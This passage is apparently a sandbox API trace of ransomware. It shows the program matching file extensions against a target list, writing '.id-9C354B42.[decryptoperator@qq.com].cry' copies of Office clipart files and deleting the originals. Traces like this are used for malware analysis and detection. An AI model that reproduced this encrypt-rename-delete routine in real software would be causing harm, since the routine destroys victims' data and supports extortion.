[0052.735] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.735] lstrlenW (lpString=".rar") returned 4 [0052.735] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.735] lstrlenW (lpString=".bz2") returned 4 [0052.735] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.735] lstrlenW (lpString=".7z") returned 3 [0052.735] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0052.735] lstrlenW (lpString=".dbf") returned 4 [0052.735] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0052.735] lstrlenW (lpString=".1cd") returned 4 [0052.735] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0052.735] lstrlenW (lpString=".jpg") returned 4 [0052.735] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.736] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=9240) returned 1 [0052.736] CloseHandle (hObject=0x21c) returned 1 [0052.739] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf")) returned 0x20 [0052.739] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.739] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.739] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0052.740] GetLastError () returned 0x0 [0052.740] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x2418, lpOverlapped=0x0) returned 1 [0052.762] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x2420, lpOverlapped=0x0) returned 1 [0052.763] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.763] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.763] SetEndOfFile (hFile=0x1c0) returned 1 [0052.764] CloseHandle (hObject=0x1c0) returned 1 [0052.764] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.764] SetEndOfFile (hFile=0x21c) returned 1 [0052.764] CloseHandle (hObject=0x21c) returned 1 [0052.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.765] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf")) returned 1 [0052.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0052.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0052.765] lstrlenW (lpString=".doc") returned 4 [0052.765] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.765] lstrlenW (lpString=".docx") returned 5 [0052.765] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.765] lstrlenW (lpString=".pdf") returned 4 [0052.765] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.765] lstrlenW (lpString=".xls") returned 4 [0052.765] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.765] lstrlenW (lpString=".xlsx") returned 5 [0052.765] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.765] lstrlenW (lpString=".ppt") returned 4 [0052.765] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0052.765] lstrlenW (lpString=".zip") returned 4 [0052.765] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.765] lstrlenW (lpString=".rar") returned 4 [0052.765] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.765] lstrlenW (lpString=".bz2") returned 4 [0052.765] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.765] lstrlenW (lpString=".7z") returned 3 [0052.765] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0052.765] lstrlenW (lpString=".dbf") returned 4 [0052.765] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0052.766] lstrlenW (lpString=".1cd") returned 4 [0052.766] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0052.766] lstrlenW (lpString=".jpg") returned 4 [0052.766] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.766] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=2344) returned 1 [0052.766] CloseHandle (hObject=0x21c) returned 1 [0052.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf")) returned 0x20 [0052.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.766] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.766] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0052.767] GetLastError () returned 0x0 [0052.767] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x928, lpOverlapped=0x0) returned 1 [0052.787] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x930, lpOverlapped=0x0) returned 1 [0052.788] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.788] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.788] SetEndOfFile (hFile=0x1c0) returned 1 [0052.788] CloseHandle (hObject=0x1c0) returned 1 [0052.788] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.788] SetEndOfFile (hFile=0x21c) returned 1 [0052.789] CloseHandle (hObject=0x21c) returned 1 [0052.789] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.789] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf")) returned 1 [0052.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0052.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0052.789] lstrlenW (lpString=".doc") returned 4 [0052.789] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.789] lstrlenW (lpString=".docx") returned 5 [0052.789] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.789] lstrlenW (lpString=".pdf") returned 4 [0052.789] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.789] lstrlenW (lpString=".xls") returned 4 [0052.789] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.789] lstrlenW (lpString=".xlsx") returned 5 [0052.789] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.789] lstrlenW (lpString=".ppt") returned 4 [0052.789] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0052.789] lstrlenW (lpString=".zip") returned 4 [0052.789] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.789] lstrlenW (lpString=".rar") returned 4 [0052.789] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.789] lstrlenW (lpString=".bz2") returned 4 [0052.789] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.790] lstrlenW (lpString=".7z") returned 3 [0052.790] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0052.790] lstrlenW (lpString=".dbf") returned 4 [0052.790] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0052.790] lstrlenW (lpString=".1cd") returned 4 [0052.790] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0052.790] lstrlenW (lpString=".jpg") returned 4 [0052.790] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.790] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=6060) returned 1 [0052.790] CloseHandle (hObject=0x21c) returned 1 [0052.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf")) returned 0x20 [0052.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.791] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.791] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0052.792] GetLastError () returned 0x0 [0052.792] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x17ac, lpOverlapped=0x0) returned 1 [0052.799] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x17b0, lpOverlapped=0x0) returned 1 [0052.800] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.800] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.800] SetEndOfFile (hFile=0x1c0) returned 1 [0052.800] CloseHandle (hObject=0x1c0) returned 1 [0052.801] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.801] SetEndOfFile (hFile=0x21c) returned 1 [0052.801] CloseHandle (hObject=0x21c) returned 1 [0052.801] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.801] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf")) returned 1 [0052.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0052.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0052.802] lstrlenW (lpString=".doc") returned 4 [0052.802] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.802] lstrlenW (lpString=".docx") returned 5 [0052.802] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.802] lstrlenW (lpString=".pdf") returned 4 [0052.802] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.802] lstrlenW (lpString=".xls") returned 4 [0052.802] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.802] lstrlenW (lpString=".xlsx") returned 5 [0052.802] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.802] lstrlenW (lpString=".ppt") returned 4 [0052.802] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0052.802] lstrlenW (lpString=".zip") returned 4 [0052.802] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.802] lstrlenW (lpString=".rar") returned 4 [0052.802] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.802] lstrlenW (lpString=".bz2") returned 4 [0052.802] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.802] lstrlenW (lpString=".7z") returned 3 [0052.802] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0052.802] lstrlenW (lpString=".dbf") returned 4 [0052.802] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0052.802] lstrlenW (lpString=".1cd") returned 4 [0052.802] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0052.802] lstrlenW (lpString=".jpg") returned 4 [0052.802] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.803] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=3416) returned 1 [0052.803] CloseHandle (hObject=0x21c) returned 1 [0052.803] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf")) returned 0x20 [0052.803] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.803] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.803] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0052.803] GetLastError () returned 0x0 [0052.803] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0xd58, lpOverlapped=0x0) returned 1 [0052.835] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xd60, lpOverlapped=0x0) returned 1 [0052.836] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.836] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.836] SetEndOfFile (hFile=0x1c0) returned 1 [0052.836] CloseHandle (hObject=0x1c0) returned 1 [0052.837] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.837] SetEndOfFile (hFile=0x21c) returned 1 [0052.837] CloseHandle (hObject=0x21c) returned 1 [0052.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.838] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf")) returned 1 [0052.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0052.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0052.934] lstrlenW (lpString=".doc") returned 4 [0052.934] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.934] lstrlenW (lpString=".docx") returned 5 [0052.934] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.934] lstrlenW (lpString=".pdf") returned 4 [0052.934] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.934] lstrlenW (lpString=".xls") returned 4 [0052.934] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.934] lstrlenW (lpString=".xlsx") returned 5 [0052.934] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.934] lstrlenW (lpString=".ppt") returned 4 [0052.935] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0052.935] lstrlenW (lpString=".zip") returned 4 [0052.935] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.935] lstrlenW (lpString=".rar") returned 4 [0052.935] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.935] lstrlenW (lpString=".bz2") returned 4 [0052.935] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.935] lstrlenW (lpString=".7z") returned 3 [0052.935] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0052.935] lstrlenW (lpString=".dbf") returned 4 [0052.935] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0052.935] lstrlenW (lpString=".1cd") returned 4 [0052.935] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0052.935] lstrlenW (lpString=".jpg") returned 4 [0052.935] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.991] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.991] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0052.991] GetLastError () returned 0x0 [0052.991] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x19ec, lpOverlapped=0x0) returned 1 [0052.999] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x19f0, lpOverlapped=0x0) returned 1 [0052.999] ReadFile (in: hFile=0x21c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.999] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.000] SetEndOfFile (hFile=0x20c) returned 1 [0053.000] CloseHandle 